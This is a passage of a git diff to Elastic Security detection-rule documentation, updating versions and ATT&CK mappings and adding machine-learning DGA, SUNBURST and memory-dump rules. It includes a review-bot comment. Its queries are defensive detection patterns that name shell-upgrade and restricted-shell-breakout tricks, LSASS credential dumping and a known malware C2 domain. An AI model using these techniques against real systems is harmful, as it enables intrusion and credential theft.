diff --git a/docs/detections/prebuilt-rules/rule-details/interactive-terminal-spawned-via-python.asciidoc b/docs/detections/prebuilt-rules/rule-details/interactive-terminal-spawned-via-python.asciidoc index 690fb1f9ca..7c3794afd8 100644 --- a/docs/detections/prebuilt-rules/rule-details/interactive-terminal-spawned-via-python.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/interactive-terminal-spawned-via-python.asciidoc @@ -31,7 +31,7 @@ Identifies when a terminal (tty) is spawned via Python. Attackers may upgrade a * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -47,10 +47,10 @@ Identifies when a terminal (tty) is spawned via Python. Attackers may upgrade a ---------------------------------- process where host.os.type == "linux" and event.action in ("exec", "exec_event") and ( - (process.parent.name : "python*" and process.name : "*sh" and process.parent.args_count >= 3 and - process.parent.args : "*pty.spawn*" and process.parent.args : "-c") or - (process.parent.name : "python*" and process.name : "*sh" and process.args : "*sh" and process.args_count == 1 - and process.parent.args_count == 1) + (process.parent.name : "python*" and process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", + "fish") and process.parent.args_count >= 3 and process.parent.args : "*pty.spawn*" and process.parent.args : "-c") or + (process.parent.name : "python*" and process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", + "fish") and process.args : "*sh" and process.args_count == 1 and process.parent.args_count == 1) ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/kerberos-pre-authentication-disabled-for-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/kerberos-pre-authentication-disabled-for-user.asciidoc index 97bb4a4807..91b52c32cf 100644 
--- a/docs/detections/prebuilt-rules/rule-details/kerberos-pre-authentication-disabled-for-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kerberos-pre-authentication-disabled-for-user.asciidoc @@ -33,11 +33,13 @@ Identifies the modification of an account's Kerberos pre-authentication options. * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Defense Evasion +* Tactic: Privilege Escalation * Resources: Investigation Guide * Use Case: Active Directory Monitoring * Data Source: Active Directory -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -103,3 +105,23 @@ event.code:4738 and winlog.api:"wineventlog" and message:"'Don't Require Preauth ** Name: AS-REP Roasting ** ID: T1558.004 ** Reference URL: https://attack.mitre.org/techniques/T1558/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/kernel-load-or-unload-via-kexec-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/kernel-load-or-unload-via-kexec-detected.asciidoc index 05ab43a76d..34448a71bf 100644 --- a/docs/detections/prebuilt-rules/rule-details/kernel-load-or-unload-via-kexec-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kernel-load-or-unload-via-kexec-detected.asciidoc 
@@ -35,7 +35,7 @@ This detection rule identifies the usage of kexec, helping to uncover unauthoriz * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/kernel-module-load-via-insmod.asciidoc b/docs/detections/prebuilt-rules/rule-details/kernel-module-load-via-insmod.asciidoc index 5a737bf7dd..ffecd6d10d 100644 --- a/docs/detections/prebuilt-rules/rule-details/kernel-module-load-via-insmod.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kernel-module-load-via-insmod.asciidoc @@ -1,5 +1,5 @@ [[kernel-module-load-via-insmod]] -=== Kernel module load via insmod +=== Kernel Module Load via insmod Detects the use of the insmod binary to load a Linux kernel object file. Threat actors can use this binary, given they have root privileges, to load a rootkit on a system providing them with complete control and the ability to hide from security products. Manually loading a kernel module in this manner should not be at all common and can indicate suspcious or malicious behavior. @@ -34,7 +34,7 @@ Detects the use of the insmod binary to load a Linux kernel object file. Threat * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -49,6 +49,7 @@ Detects the use of the insmod binary to load a Linux kernel object file. Threat [source, js] ---------------------------------- process where host.os.type == "linux" and event.type == "start" and process.name == "insmod" and process.args : "*.ko" +and not process.parent.name in ("cisco-amp-helper", "ksplice-apply") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/kernel-module-removal.asciidoc b/docs/detections/prebuilt-rules/rule-details/kernel-module-removal.asciidoc index d0ef43bd5d..d3dbd1e29f 100644 --- a/docs/detections/prebuilt-rules/rule-details/kernel-module-removal.asciidoc 
+++ b/docs/detections/prebuilt-rules/rule-details/kernel-module-removal.asciidoc @@ -33,7 +33,7 @@ Kernel modules are pieces of code that can be loaded and unloaded into the kerne * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/kirbi-file-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/kirbi-file-creation.asciidoc index 576455b5c1..5d127729cc 100644 --- a/docs/detections/prebuilt-rules/rule-details/kirbi-file-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kirbi-file-creation.asciidoc @@ -30,7 +30,7 @@ Identifies the creation of .kirbi files. The creation of this kind of file is an * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -62,15 +62,3 @@ file where host.os.type == "windows" and event.type == "creation" and file.exten ** Name: Steal or Forge Kerberos Tickets ** ID: T1558 ** Reference URL: https://attack.mitre.org/techniques/T1558/ -* Tactic: -** Name: Execution -** ID: TA0002 -** Reference URL: https://attack.mitre.org/tactics/TA0002/ -* Technique: -** Name: Command and Scripting Interpreter -** ID: T1059 -** Reference URL: https://attack.mitre.org/techniques/T1059/ -* Sub-technique: -** Name: PowerShell -** ID: T1059.001 -** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/lateral-movement-via-startup-folder.asciidoc b/docs/detections/prebuilt-rules/rule-details/lateral-movement-via-startup-folder.asciidoc index 1ae8d9f327..8eaa2c3a5b 100644 --- a/docs/detections/prebuilt-rules/rule-details/lateral-movement-via-startup-folder.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/lateral-movement-via-startup-folder.asciidoc 
@@ -35,7 +35,7 @@ Identifies suspicious file creations in the startup folder of a remote system. A * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -77,6 +77,10 @@ file where host.os.type == "windows" and event.type in ("creation", "change") an ** Name: Remote Services ** ID: T1021 ** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: https://attack.mitre.org/techniques/T1021/001/ * Tactic: ** Name: Persistence ** ID: TA0003 diff --git a/docs/detections/prebuilt-rules/rule-details/linux-init-pid-1-secret-dump-via-gdb.asciidoc b/docs/detections/prebuilt-rules/rule-details/linux-init-pid-1-secret-dump-via-gdb.asciidoc index 69039f0e33..e40beea651 100644 --- a/docs/detections/prebuilt-rules/rule-details/linux-init-pid-1-secret-dump-via-gdb.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/linux-init-pid-1-secret-dump-via-gdb.asciidoc @@ -32,7 +32,7 @@ This rule monitors for the potential memory dump of the init process (PID 1) thr * Tactic: Credential Access * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/linux-restricted-shell-breakout-via-linux-binary-s.asciidoc b/docs/detections/prebuilt-rules/rule-details/linux-restricted-shell-breakout-via-linux-binary-s.asciidoc index 19025309b9..0ecc2ab733 100644 --- a/docs/detections/prebuilt-rules/rule-details/linux-restricted-shell-breakout-via-linux-binary-s.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/linux-restricted-shell-breakout-via-linux-binary-s.asciidoc @@ -56,7 +56,7 @@ Identifies the abuse of a Linux binary to break out of a restricted shell or env * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 109 +*Version*: 110 *Rule authors*: 
@@ -116,38 +116,6 @@ Initiate the incident response process based on the outcome of the triage. - Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). - -### Elastic Defend Integration Setup -Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows -the Elastic Agent to monitor events on your host and send data to the Elastic Security app. - -#### Prerequisite Requirements: -- Fleet is required for Elastic Defend. -- To configure Fleet Server refer to the {security-guide}/fleet/current/fleet-server.html[documentation]. - -#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Elastic Defend and select the integration to see more details about it. -- Click Add Elastic Defend. -- Configure the integration name and optionally add a description. -- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads. -- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. {security-guide}/security/current/configure-endpoint-integration-policy.html[Helper guide]. -- We suggest to select "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" -- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead. -For more details on Elastic Agent configuration settings, refer to the {security-guide}/fleet/8.10/agent-policy.html[helper guide]. -- Click Save and Continue. 
-- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts. -For more details on Elastic Defend refer to the {security-guide}/security/current/install-endpoint.html[helper guide]. - -Session View uses process data collected by the Elastic Defend integration, but this data is not always collected by default. Session View is available on enterprise subscription for versions 8.3 and above. -#### To confirm that Session View data is enabled: -- Go to Manage → Policies, and edit one or more of your Elastic Defend integration policies. -- Select the Policy settings tab, then scroll down to the Linux event collection section near the bottom. -- Check the box for Process events, and turn on the Include session data toggle. -- If you want to include file and network alerts in Session View, check the boxes for Network and File events. -- If you want to enable terminal output capture, turn on the Capture terminal output toggle. -For more information about the additional fields collected when this setting is enabled and -the usage of Session View for Analysis refer to the {security-guide}/security/current/session-view.html[helper guide]. ---------------------------------- ==== Rule query @@ -161,7 +129,7 @@ process where host.os.type == "linux" and event.type == "start" and (process.name == "capsh" and process.args == "--") or /* launching shells from unusual parents or parent+arg combos */ - (process.name : "*sh" and ( + (process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and ( (process.parent.name : "*awk" and process.parent.args : "BEGIN {system(*)}") or (process.parent.name == "git" and process.parent.args : ("*PAGER*", "!*sh", "exec *sh") or process.args : ("*PAGER*", "!*sh", "exec *sh") and not process.name == "ssh" ) or 
diff --git a/docs/detections/prebuilt-rules/rule-details/linux-user-added-to-privileged-group.asciidoc b/docs/detections/prebuilt-rules/rule-details/linux-user-added-to-privileged-group.asciidoc index b0835b2f44..4da73e9689 100644 --- a/docs/detections/prebuilt-rules/rule-details/linux-user-added-to-privileged-group.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/linux-user-added-to-privileged-group.asciidoc @@ -32,7 +32,7 @@ Identifies attempts to add a user to a privileged group. Attackers may add users * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -92,6 +92,7 @@ This rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/local-account-tokenfilter-policy-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/local-account-tokenfilter-policy-disabled.asciidoc index d4f28d1a3b..151c7c9709 100644 --- a/docs/detections/prebuilt-rules/rule-details/local-account-tokenfilter-policy-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/local-account-tokenfilter-policy-disabled.asciidoc @@ -34,11 +34,11 @@ Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion -* Tactic: Privilege Escalation +* Tactic: Lateral Movement * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: 
@@ -69,15 +69,19 @@ registry where host.os.type == "windows" and registry.path : ( ** Name: Modify Registry ** ID: T1112 ** Reference URL: https://attack.mitre.org/techniques/T1112/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ * Tactic: -** Name: Privilege Escalation -** ID: TA0004 -** Reference URL: https://attack.mitre.org/tactics/TA0004/ +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ * Technique: -** Name: Valid Accounts -** ID: T1078 -** Reference URL: https://attack.mitre.org/techniques/T1078/ +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ * Sub-technique: -** Name: Local Accounts -** ID: T1078.003 -** Reference URL: https://attack.mitre.org/techniques/T1078/003/ +** Name: Pass the Hash +** ID: T1550.002 +** Reference URL: https://attack.mitre.org/techniques/T1550/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/lsass-process-access-via-windows-api.asciidoc b/docs/detections/prebuilt-rules/rule-details/lsass-process-access-via-windows-api.asciidoc index 5841f8e68b..c07ce03182 100644 --- a/docs/detections/prebuilt-rules/rule-details/lsass-process-access-via-windows-api.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/lsass-process-access-via-windows-api.asciidoc @@ -29,9 +29,10 @@ Identifies access attempts to the LSASS handle, which may indicate an attempt to * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Execution * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: 
@@ -89,3 +90,11 @@ api where host.os.type == "windows" and ** Name: LSASS Memory ** ID: T1003.001 ** Reference URL: https://attack.mitre.org/techniques/T1003/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc new file mode 100644 index 0000000000..d5f88325a2 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc 
@@ -0,0 +1,77 @@ +[[machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain]] +=== Machine Learning Detected a DNS Request Predicted to be a DGA Domain + +A supervised machine learning model has identified a DNS question name that is predicted to be the result of a Domain Generation Algorithm (DGA), which could indicate command and control network activity. + +*Rule type*: query + +*Rule indices*: + +* logs-endpoint.events.* +* logs-network_traffic.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/dga + +*Tags*: + +* Domain: Network +* Domain: Endpoint +* Data Source: Elastic Defend +* Use Case: Domain Generation Algorithm Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Command and Control + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +ml_is_dga.malicious_prediction:1 and not dns.question.registered_domain:avsvmcloud.com + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc new file mode 100644 index 0000000000..c1395864ff --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc 
@@ -0,0 +1,77 @@ +[[machine-learning-detected-a-dns-request-with-a-high-dga-probability-score]] +=== Machine Learning Detected a DNS Request With a High DGA Probability Score + +A supervised machine learning model has identified a DNS question name with a high probability of sourcing from a Domain Generation Algorithm (DGA), which could indicate command and control network activity. + +*Rule type*: query + +*Rule indices*: + +* logs-endpoint.events.* +* logs-network_traffic.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/dga + +*Tags*: + +* Domain: Network +* Domain: Endpoint +* Data Source: Elastic Defend +* Use Case: Domain Generation Algorithm Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Command and Control + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +ml_is_dga.malicious_probability > 0.98 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc new file mode 100644 index 0000000000..19ce3ca0a7 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc 
@@ -0,0 +1,78 @@ +[[machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity]] +=== Machine Learning Detected a Suspicious Windows Event Predicted to be Malicious Activity + +A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-endpoint.events.process-* +* winlogbeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* OS: Windows +* Data Source: Elastic Endgame +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where (problemchild.prediction == 1 or blocklist_label == 1) and not process.args : ("*C:\\WINDOWS\\temp\\nessus_*.txt*", "*C:\\WINDOWS\\temp\\nessus_*.tmp*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* 
Sub-technique: +** Name: Masquerade Task or Service +** ID: T1036.004 +** Reference URL: https://attack.mitre.org/techniques/T1036/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc new file mode 100644 index 0000000000..47effc8ae7 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc 
@@ -0,0 +1,79 @@ +[[machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score]] +=== Machine Learning Detected a Suspicious Windows Event with a High Malicious Probability Score + +A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-endpoint.events.process-* +* winlogbeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* OS: Windows +* Data Source: Elastic Endgame +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where ((problemchild.prediction == 1 and problemchild.prediction_probability > 0.98) or +blocklist_label == 1) and not process.args : ("*C:\\WINDOWS\\temp\\nessus_*.txt*", "*C:\\WINDOWS\\temp\\nessus_*.tmp*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference 
URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Masquerade Task or Service +** ID: T1036.004 +** Reference URL: https://attack.mitre.org/techniques/T1036/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc new file mode 100644 index 0000000000..13397d4551 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc 
@@ -0,0 +1,77 @@ +[[machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain]] +=== Machine Learning Detected DGA activity using a known SUNBURST DNS domain + +A supervised machine learning model has identified a DNS question name that used by the SUNBURST malware and is predicted to be the result of a Domain Generation Algorithm. + +*Rule type*: query + +*Rule indices*: + +* logs-endpoint.events.* +* logs-network_traffic.* + +*Severity*: critical + +*Risk score*: 99 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/dga + +*Tags*: + +* Domain: Network +* Domain: Endpoint +* Data Source: Elastic Defend +* Use Case: Domain Generation Algorithm Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Command and Control + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +ml_is_dga.malicious_prediction:1 and dns.question.registered_domain:avsvmcloud.com + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ 
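Review bot: grammar in the description of the new DGA page: `A supervised machine learning model has identified a DNS question name that used by the SUNBURST malware` should read `that was used by`. The `==== Investigation guide` block below it is an empty `[source, markdown]` block; since the rule ships as `critical` with risk score 99, a short note on what a hit looks like (`ml_is_dga.malicious_prediction:1` together with `dns.question.registered_domain:avsvmcloud.com`) and on the `logs-network_traffic.*` index dependency would help responders, or the heading should be dropped until the guide exists.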
diff --git a/docs/detections/prebuilt-rules/rule-details/memory-dump-file-with-unusual-extension.asciidoc b/docs/detections/prebuilt-rules/rule-details/memory-dump-file-with-unusual-extension.asciidoc new file mode 100644 index 0000000000..469c45d68f --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/memory-dump-file-with-unusual-extension.asciidoc 
@@ -0,0 +1,86 @@ +[[memory-dump-file-with-unusual-extension]] +=== Memory Dump File with Unusual Extension + +Identifies the creation of a memory dump file with an unusual extension, which can indicate an attempt to disguise a memory dump as another file type to bypass security defenses. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Rule Type: BBR + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type == "creation" and + + /* MDMP header */ + file.Ext.header_bytes : "4d444d50*" and + not file.extension : ("dmp", "mdmp", "hdmp", "edmp", "full", "tdref", "cg", "tmp", "dat") and + not + ( + process.executable : "?:\\Program Files\\Endgame\\esensor.exe" and + process.code_signature.trusted == true and length(file.extension) == 0 + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: LSASS Memory +** ID: T1003.001 +** Reference URL: https://attack.mitre.org/techniques/T1003/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: 
https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Masquerade File Type +** ID: T1036.008 +** Reference URL: https://attack.mitre.org/techniques/T1036/008/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-started-an-unusual-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-started-an-unusual-process.asciidoc index 06b94e1cda..50a645e12a 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-started-an-unusual-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-started-an-unusual-process.asciidoc @@ -34,7 +34,7 @@ An instance of MSBuild, the Microsoft Build Engine, started a PowerShell script * Tactic: Execution * Data Source: Elastic Defend -*Version*: 206 +*Version*: 207 *Rule authors*: @@ -75,3 +75,11 @@ process.name.caseless:("csc.exe" or "iexplore.exe" or "powershell.exe") ** Name: Compile After Delivery ** ID: T1027.004 ** Reference URL: https://attack.mitre.org/techniques/T1027/004/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-started-by-a-script-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-started-by-a-script-process.asciidoc index 22650ee22a..287b1c2fa8 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-started-by-a-script-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-started-by-a-script-process.asciidoc @@ -32,7 +32,7 @@ An instance of MSBuild, the Microsoft Build Engine, was started by a script 